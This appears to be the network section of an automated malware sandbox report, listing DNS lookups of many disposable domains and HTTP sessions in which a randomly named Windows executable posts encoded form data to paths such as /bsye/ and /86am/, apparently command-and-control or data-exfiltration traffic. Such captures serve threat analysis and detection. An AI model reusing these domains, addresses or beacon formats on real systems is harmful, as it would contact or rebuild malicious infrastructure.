Jan 10, 2025 21:31:22.229120016 CET | 192.168.2.6 | 1.1.1.1 | 0xde04 | Standard query (0) | www.muasamgiare.click | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:36.416125059 CET | 192.168.2.6 | 1.1.1.1 | 0xc323 | Standard query (0) | www.kkpmoneysocial.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:50.090981007 CET | 192.168.2.6 | 1.1.1.1 | 0xc1f6 | Standard query (0) | www.artkub.net | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:58.323627949 CET | 192.168.2.6 | 1.1.1.1 | 0x523b | Standard query (0) | www.happyjam.life | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:32:11.683439970 CET | 192.168.2.6 | 1.1.1.1 | 0x4ed0 | Standard query (0) | www.123hellodrive.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:32:24.917421103 CET | 192.168.2.6 | 1.1.1.1 | 0x2d0a | Standard query (0) | www.zoomlive.live | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:32:39.652617931 CET | 192.168.2.6 | 1.1.1.1 | 0x1601 | Standard query (0) | www.dietcoffee.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:32:53.385942936 CET | 192.168.2.6 | 1.1.1.1 | 0x3630 | Standard query (0) | www.guacamask.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:07.480551004 CET | 192.168.2.6 | 1.1.1.1 | 0x8edb | Standard query (0) | www.appsolucao.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:20.683286905 CET | 192.168.2.6 | 1.1.1.1 | 0xa93c | Standard query (0) | www.aziziyeescortg.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 21:31:05.454762936 CET | 1.1.1.1 | 192.168.2.6 | 0xd8d8 | No error (0) | www.7261ltajbc.bond | | 154.12.28.184 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:22.755218983 CET | 1.1.1.1 | 192.168.2.6 | 0xde04 | No error (0) | www.muasamgiare.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:31:22.755218983 CET | 1.1.1.1 | 192.168.2.6 | 0xde04 | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:22.755218983 CET | 1.1.1.1 | 192.168.2.6 | 0xde04 | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:36.772914886 CET | 1.1.1.1 | 192.168.2.6 | 0xc323 | No error (0) | www.kkpmoneysocial.top | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:36.772914886 CET | 1.1.1.1 | 192.168.2.6 | 0xc323 | No error (0) | www.kkpmoneysocial.top | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:36.772914886 CET | 1.1.1.1 | 192.168.2.6 | 0xc323 | No error (0) | www.kkpmoneysocial.top | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:36.772914886 CET | 1.1.1.1 | 192.168.2.6 | 0xc323 | No error (0) | www.kkpmoneysocial.top | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:36.772914886 CET | 1.1.1.1 | 192.168.2.6 | 0xc323 | No error (0) | www.kkpmoneysocial.top | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:36.772914886 CET | 1.1.1.1 | 192.168.2.6 | 0xc323 | No error (0) | www.kkpmoneysocial.top | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:36.772914886 CET | 1.1.1.1 | 192.168.2.6 | 0xc323 | No error (0) | www.kkpmoneysocial.top | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:31:58.364725113 CET | 1.1.1.1 | 192.168.2.6 | 0x523b | No error (0) | www.happyjam.life | | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:32:11.732824087 CET | 1.1.1.1 | 192.168.2.6 | 0x4ed0 | No error (0) | www.123hellodrive.shop | 123hellodrive.shop | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:32:11.732824087 CET | 1.1.1.1 | 192.168.2.6 | 0x4ed0 | No error (0) | 123hellodrive.shop | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:32:25.573565960 CET | 1.1.1.1 | 192.168.2.6 | 0x2d0a | No error (0) | www.zoomlive.live | | 154.208.202.225 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:32:39.676583052 CET | 1.1.1.1 | 192.168.2.6 | 0x1601 | No error (0) | www.dietcoffee.online | | 77.68.64.45 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:32:53.616056919 CET | 1.1.1.1 | 192.168.2.6 | 0x3630 | No error (0) | www.guacamask.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:07.531820059 CET | 1.1.1.1 | 192.168.2.6 | 0x8edb | No error (0) | www.appsolucao.shop | appsolucao.shop | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:33:07.531820059 CET | 1.1.1.1 | 192.168.2.6 | 0x8edb | No error (0) | appsolucao.shop | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:20.697514057 CET | 1.1.1.1 | 192.168.2.6 | 0xa93c | No error (0) | www.aziziyeescortg.xyz | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:20.697514057 CET | 1.1.1.1 | 192.168.2.6 | 0xa93c | No error (0) | www.aziziyeescortg.xyz | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:20.697514057 CET | 1.1.1.1 | 192.168.2.6 | 0xa93c | No error (0) | www.aziziyeescortg.xyz | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:20.697514057 CET | 1.1.1.1 | 192.168.2.6 | 0xa93c | No error (0) | www.aziziyeescortg.xyz | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:20.697514057 CET | 1.1.1.1 | 192.168.2.6 | 0xa93c | No error (0) | www.aziziyeescortg.xyz | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:20.697514057 CET | 1.1.1.1 | 192.168.2.6 | 0xa93c | No error (0) | www.aziziyeescortg.xyz | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:33:20.697514057 CET | 1.1.1.1 | 192.168.2.6 | 0xa93c | No error (0) | www.aziziyeescortg.xyz | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 64216 | 154.12.28.184 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:31:05.476617098 CET | 491 | OUT | GET /vt4e/?bJMLqbS=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.7261ltajbc.bond
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Jan 10, 2025 21:31:07.184508085 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:31:06 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2025 21:31:07.185071945 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:31:06 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2025 21:31:07.186158895 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:31:06 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 64218 | 18.139.62.226 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:31:22.794205904 CET | 759 | OUT | POST /bsye/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.muasamgiare.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/bsye/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4VDvKMWbFEA/KPn42K/VJZ3YKbVSBErNOTMKkQDOBKN1
Jan 10, 2025 21:31:23.748260021 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 10 Jan 2025 20:31:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/bsye/
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 64219 | 18.139.62.226 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:31:25.350195885 CET | 783 | OUT | POST /bsye/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.muasamgiare.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/bsye/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO02vu5EoaEFEZFmnqTaynn9QroR49XyzYsrHtbUFVmq7OT8jHVrj7jAXla8tYdMHNsHlptJs7B1WmZhOnxRSAQc00lLvJpgCPyrefOxjMXZMiICKkX3gsUj7i3e5AsmgGVE8P56iq5/2bJXaKZNgBkrnMT0K2HPpO+oW7GoBwhCMs94ptSW/jCzvmw==
Jan 10, 2025 21:31:26.287628889 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 10 Jan 2025 20:31:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/bsye/
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 64220 | 18.139.62.226 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:31:27.907691956 CET | 1796 | OUT | POST /bsye/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.muasamgiare.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/bsye/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO0OvpPYocn9EYFmngzaznn8MroJ09XuJYpvHs+AFAjG7Xj8jYFr3mzAGlatFYdcHNsHlprFs8UBWgZhNxhReEQdr0heYJpkSPGfefuhjBCFM+YCInX34sUvgi3C9AuGGGXY8OenC5IfcIZL7WqNhFTzIJAQ0m3/+EtY62C0plC32tbcLnSvsiQmH+4JM1kUozn/uuob2mqQZuhy4iKxARuJX5ndEWcbF1MNvvqH80F1c+aupcXzPvj/yIitDeO2IRBQNbwYge6XwgPthEV6LcTm6wwO0gd+BM4SLJKwEk6Jn4Evsz03zDQYSIdCAJVxnNyWjqqnu4GEfa5W5omOuelW+B5xGm+7oZpsb3ORI5M2VWnQ1uDAqh9MBu7gkBSHVGQv4ymdmw2ouPlRDY9IM3m78SYvoN3uvbmGoWiwtR4TdEatMWbJgkH/737gd3ogmCcGVCqmQHARqd+gLpCMdS07VifSdt9mJyjY4Ho1cIiCYkAo9XFl5u0l95sM8aExBPSXd/vOy4Ja6A8GJ1ikPehJsqYTCxPMl+35STU80E+qx1IwVZsrZlXJnQ59idPu94YPokNDRCOtcQubkBmiQylsTnHMaI+0OLAXdNOUczKIklPUR4E1voEv6Xfrve5SGbYgezU3RI79pzGllgaJcvZpBlDaiwis0MCyR2spmDdnBPvXmF/0BE+dfI+1gZufqxgmWKJPpOoDoP+/+6R5DSdNyXO5CaP1+MCzYhHVw1X33MZ4OmrUIrwSIA8V1m+/rQMUC7MW4gFBq/ay+unUrU8UVe9Xt33jQ25x97CCvGEDw3hbGzbfZ4lgYk9461VzoZvJ9TIVvrIdGHiv17nX2m6C4qolGwHZGKnjikSJCCyG9SeYk1ozKTeGKWLIl65GNw83S+G+dNvVVdKTp/d9/5ghiAPao8ScBwpKuEAjgDCbiaeWLpKtJklQYwxVBVKtPpdj7 [TRUNCATED]
                                                                    Jan 10, 2025 21:31:28.841588020 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 10 Jan 2025 20:31:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/bsye/
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.6 | 64221 | 18.139.62.226 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:31:30.455719948 CET | 493 | OUT | GET /bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.muasamgiare.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:31:31.402487993 CET | 530 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 10 Jan 2025 20:31:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jR
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.6 | 64223 | 104.21.16.1 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:31:36.798453093 CET | 762 | OUT | POST /86am/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kkpmoneysocial.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.kkpmoneysocial.top
                                                                    Referer: http://www.kkpmoneysocial.top/86am/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:31:37.436233997 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:31:37 GMT
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Set-Cookie: loclang=en; expires=Mon, 13-Jan-2025 20:31:37 GMT; Max-Age=259200; path=/
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yg90%2B%2Fbz9K5DQsGq9%2Ffe1zPeTvTg%2FFAXNXybT5zZMYjt7YnATDmOoS7wyF%2BOI%2BtR7HLhkgYdja7tI4euiWwYc%2B9ml%2FVcCBDl4WliXDqPs4X0RaFJ8R5%2FrwcMvg4cE4Wws6poYCrys%2F%2BQ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff6e8189448ce0-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1771&rtt_var=885&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.6 | 64224 | 104.21.16.1 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:31:39.345108032 CET | 786 | OUT | POST /86am/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kkpmoneysocial.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.kkpmoneysocial.top
                                                                    Referer: http://www.kkpmoneysocial.top/86am/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:31:39.963565111 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:31:39 GMT
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Set-Cookie: loclang=en; expires=Mon, 13-Jan-2025 20:31:39 GMT; Max-Age=259200; path=/
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KB68N1Ld82R%2FnxSdtOcOm4W1sQlhP7Eb7JwZLsUgkRHV34bVrK7U7AG8tS36QfeVWLzeD6D7TTMHE53dqsQErbp67SJQPMqGkm0Fb%2FxLYSfAlWHnUb8l5uKKIzSFRVoRGXujSMzNI5o6"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff6e915ccd1899-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.6 | 64226 | 104.21.16.1 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:31:41.890451908 CET | 1799 | OUT | POST /86am/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kkpmoneysocial.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.kkpmoneysocial.top
                                                                    Referer: http://www.kkpmoneysocial.top/86am/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:31:42.524442911 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:31:42 GMT
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Set-Cookie: loclang=en; expires=Mon, 13-Jan-2025 20:31:42 GMT; Max-Age=259200; path=/
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AHu5Zb7h4OJPTDxXSAHYMmvuCabYTeu6BRwUKJ1ZDfqh%2B3PfLweXlvRbi%2FpNQn%2FZo7AFZUEvV1Dtmaz6MJx%2ByIBX1dVjCgHhzOhA35h9YkFABlRpcaYdiqYjH5E8jL4%2FczoSuqTxoyQ1"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff6ea158388ce0-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1794&rtt_var=897&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1799&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.6 | 64227 | 104.21.16.1 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:31:44.429563046 CET | 494 | OUT | GET /86am/?bJMLqbS=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.kkpmoneysocial.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:31:45.060214043 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:31:45 GMT
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Set-Cookie: loclang=en; expires=Mon, 13-Jan-2025 20:31:44 GMT; Max-Age=259200; path=/
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eaab2uKlk5glzc5tUqDND1qgcGZ%2BkXzASy%2Fzl64eOnfkaaJS2PEbEhY9yMgsKgRM6G75764XAoeNaxU5W%2BM7jfQMgiHXzraXk6KAsBx7CDAl1E2alJVyPiRzlwQPaoXUNRf1K0Iqyf8f"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff6eb128ec7293-EWR
                                                                    alt-svc: h3=":443"; ma=86400
